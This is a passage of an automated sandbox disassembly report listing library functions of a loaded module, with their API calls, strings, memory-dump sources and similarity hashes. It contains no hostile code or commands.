                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CounterErrorExceptionException@8LastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
                                                                                                          • String ID: Timer: QueryPerformanceCounter failed with error
                                                                                                          • API String ID: 1823523280-4075696077
                                                                                                          • Opcode ID: 4db9726f1365ee6181052e18ed15f83e70a959fb377bfb86952e1bb929d0995d
                                                                                                          • Instruction ID: d3bc6e72882bc4f93f94d2b7efd2d352d7c0218e7ca57465dedc65bf7c6003fe
                                                                                                          • Opcode Fuzzy Hash: 4db9726f1365ee6181052e18ed15f83e70a959fb377bfb86952e1bb929d0995d
                                                                                                          • Instruction Fuzzy Hash: 49213BB510C780AFD310DF64C880F9BB7E8BB89618F404A1DF5A993291DB7595048BA3
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F088E40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • QueryPerformanceFrequency.KERNEL32(F6D10407,F6D10407), ref: 6F088E7F
                                                                                                          • GetLastError.KERNEL32(0000000A), ref: 6F088E8F
                                                                                                            • Part of subcall function 6F024010: std::_Xinvalid_argument.LIBCPMT ref: 6F02402A
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F088F14
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          • Timer: QueryPerformanceFrequency failed with error , xrefs: 6F088EA5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorExceptionException@8FrequencyLastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
                                                                                                          • String ID: Timer: QueryPerformanceFrequency failed with error
                                                                                                          • API String ID: 2175244869-348333943
                                                                                                          • Opcode ID: 3bb9885cd3c82bbf9b11d91d3b5e44c9dd401b7d2eb355dbb3ffb9bfa2281f13
                                                                                                          • Instruction ID: 41f3a3da0122c46192c4e3197f9fbb45f19c5199f70085f5224e97ec50b37dff
                                                                                                          • Opcode Fuzzy Hash: 3bb9885cd3c82bbf9b11d91d3b5e44c9dd401b7d2eb355dbb3ffb9bfa2281f13
                                                                                                          • Instruction Fuzzy Hash: 5E214CB550C780AFD310DF64C840F9BB7E8FF89618F404A1DF5A993291DB7595048BA3
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F056480 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F056518
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F056558
                                                                                                          Strings
                                                                                                          • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 6F056527
                                                                                                          • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 6F0564E7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                                          • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
                                                                                                          • API String ID: 3476068407-3345525433
                                                                                                          • Opcode ID: 11df6be2b95dfe42eb6999ea4b533dc48a81238c6c2b9a1c8a66d636f620a1ed
                                                                                                          • Instruction ID: 6d7852383468bdf4f68e833270deaa8de5bc5411eff84b793b5de43c33dd4ab4
                                                                                                          • Opcode Fuzzy Hash: 11df6be2b95dfe42eb6999ea4b533dc48a81238c6c2b9a1c8a66d636f620a1ed
                                                                                                          • Instruction Fuzzy Hash: EB210271118380AFDB20DF68C940F9BB3E8BF8A61CF904A1DE599831C4EB75A004CB63
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F05C120 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F05C14E
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F0890ED
                                                                                                            • Part of subcall function 6F0890D8: __CxxThrowException@8.LIBCMT ref: 6F089102
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F089113
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                          • String ID: gfff$gfff$vector<T> too long
                                                                                                          • API String ID: 1823113695-3369487235
                                                                                                          • Opcode ID: b4bf63a443af7c57949d6d8bd0ad880601a7add4a24a1a052adbffb6fd18b736
                                                                                                          • Instruction ID: 6450a0b2ccf2e4704cc4dae2e20d3f3c1b43b516cdb10ace8bf95ed67033b75b
                                                                                                          • Opcode Fuzzy Hash: b4bf63a443af7c57949d6d8bd0ad880601a7add4a24a1a052adbffb6fd18b736
                                                                                                          • Instruction Fuzzy Hash: 9A01D173F040351F8311997FFE4054AEAC7AAC9394319CA3AEA08DF348E571E85257C6
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F045900 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::exception::exception.LIBCMT ref: 6F045932
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F045947
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                          • String ID: 0Bo$0Bo
                                                                                                          • API String ID: 4063778783-1858359205
                                                                                                          • Opcode ID: 4856accce5cd6f23fb6482e25aa42b54f39cd0372bb63dc7bd4716db9ca5202a
                                                                                                          • Instruction ID: e9601146b96b45c34c56e93749cfa644d9049d5254b2a77421ae40dd0c900bd0
                                                                                                          • Opcode Fuzzy Hash: 4856accce5cd6f23fb6482e25aa42b54f39cd0372bb63dc7bd4716db9ca5202a
                                                                                                          • Instruction Fuzzy Hash: DAE09B75404209A6EF08EBE49D117BFB3B89F01278F50077DDD25931C4EF71A6048651
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0331E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::exception::exception.LIBCMT ref: 6F033216
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F03322B
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                          • String ID: 0Bo$0Bo
                                                                                                          • API String ID: 4063778783-1858359205
                                                                                                          • Opcode ID: 9476b8739dd1c65246a683b9275a7bffa7c909393fdc69495ec188b9b5a658d1
                                                                                                          • Instruction ID: b3863e82572a18103d3eca6a0fd12d12bce580c9cf7e36847bf1cd1cf879a045
                                                                                                          • Opcode Fuzzy Hash: 9476b8739dd1c65246a683b9275a7bffa7c909393fdc69495ec188b9b5a658d1
                                                                                                          • Instruction Fuzzy Hash: 60E0657581021A66DF08EBE49D517EF73B8AF05355F40065DD825531D4FB75A20486A1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0625D0 Relevance: 6.2, APIs: 4, Instructions: 206COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$Exception@8Throw
                                                                                                          • String ID:
                                                                                                          • API String ID: 2655171816-0
                                                                                                          • Opcode ID: a57e338d5606176c521d0d40ab7f21fb291cfedd3c59373279c8602565ebc5c6
                                                                                                          • Instruction ID: b38ad15b20b068149d69dc92294c0caac93aa242b741c3dd3382721dcc40e84f
                                                                                                          • Opcode Fuzzy Hash: a57e338d5606176c521d0d40ab7f21fb291cfedd3c59373279c8602565ebc5c6
                                                                                                          • Instruction Fuzzy Hash: E0518B753087069FDB14DF68C980B6EB7EAAFC9604F10492DF895C3340EB34E9098B92
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03DE50 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Clear$Init
                                                                                                          • String ID:
                                                                                                          • API String ID: 3740757921-0
                                                                                                          • Opcode ID: 813dc76aa6f92363f757097a7075a4a13f270999bdd6f9b3e222c020136b0457
                                                                                                          • Instruction ID: 11668d1c1d2fb3fe1234731ea3f0658bb45c83ee91c34d18c2705f5d17034343
                                                                                                          • Opcode Fuzzy Hash: 813dc76aa6f92363f757097a7075a4a13f270999bdd6f9b3e222c020136b0457
                                                                                                          • Instruction Fuzzy Hash: 2641AC36A097069FD700DF29C940B5AB7EAFF89720F004A6EF9449B350D735E805CB92
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04B580 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(6F0A02A0), ref: 6F04B5D5
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F04B5E2
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04B685
                                                                                                          • VariantClear.OLEAUT32(6F0A02A0), ref: 6F04B68B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearInit
                                                                                                          • String ID:
                                                                                                          • API String ID: 2610073882-0
                                                                                                          • Opcode ID: 0051c957ee0ea5fbe57284a56b3fdce94fb5e7a6b885e6079cadf329bf0eae78
                                                                                                          • Instruction ID: 8078e8db03def596539b8b6473336e46fbe556e44780ac74a2b216d8e4e509ae
                                                                                                          • Opcode Fuzzy Hash: 0051c957ee0ea5fbe57284a56b3fdce94fb5e7a6b885e6079cadf329bf0eae78
                                                                                                          • Instruction Fuzzy Hash: 48415172A04209EFDB10DFA9C940B9AF7F9EF89314F2041A9E91497351D736E901CB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0988C9 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6F0988FD
                                                                                                          • __isleadbyte_l.LIBCMT ref: 6F098930
                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 6F098961
                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 6F0989CF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 3058430110-0
                                                                                                          • Opcode ID: f552ac212c04d91f600f16a803341fe38451f842fa98522e7d99f86b5dfbbf8e
                                                                                                          • Instruction ID: 3e9afffea284db4e6cc78e5a90dbeeb7bd969f8e731b3400439b5bd698e8acc6
                                                                                                          • Opcode Fuzzy Hash: f552ac212c04d91f600f16a803341fe38451f842fa98522e7d99f86b5dfbbf8e
                                                                                                          • Instruction Fuzzy Hash: B131D331A08346EFDB00CFA8C880BAE3BF5BF01311F94556AE5649B291F731E950EB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F092645 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _malloc.LIBCMT ref: 6F092653
                                                                                                            • Part of subcall function 6F089D66: __FF_MSGBANNER.LIBCMT ref: 6F089D7F
                                                                                                            • Part of subcall function 6F089D66: __NMSG_WRITE.LIBCMT ref: 6F089D86
                                                                                                            • Part of subcall function 6F089D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6F089BD4,6F021290,F6D10407), ref: 6F089DAB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 501242067-0
                                                                                                          • Opcode ID: 37bc8378995ceb9a27c4a152367273310d4a4d6d500a411b366e1cc6f129cf35
                                                                                                          • Instruction ID: f313b2e1285da67f5c891a9cb2b5e1f38d50c7fd544a2f89c262b3eb8a6b79b4
                                                                                                          • Opcode Fuzzy Hash: 37bc8378995ceb9a27c4a152367273310d4a4d6d500a411b366e1cc6f129cf35
                                                                                                          • Instruction Fuzzy Hash: FA11C136446B14ABCF211F74AC08B4D3BEAAF423B4F10522AE974DB9D0FF349850A794
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F037240 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F054410: _malloc.LIBCMT ref: 6F05446E
                                                                                                          • SafeArrayCreateVector.OLEAUT32(00000011,00000000,?), ref: 6F037287
                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6F03729B
                                                                                                          • _memmove.LIBCMT ref: 6F0372AF
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6F0372B8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Data$AccessCreateUnaccessVector_malloc_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 583974297-0
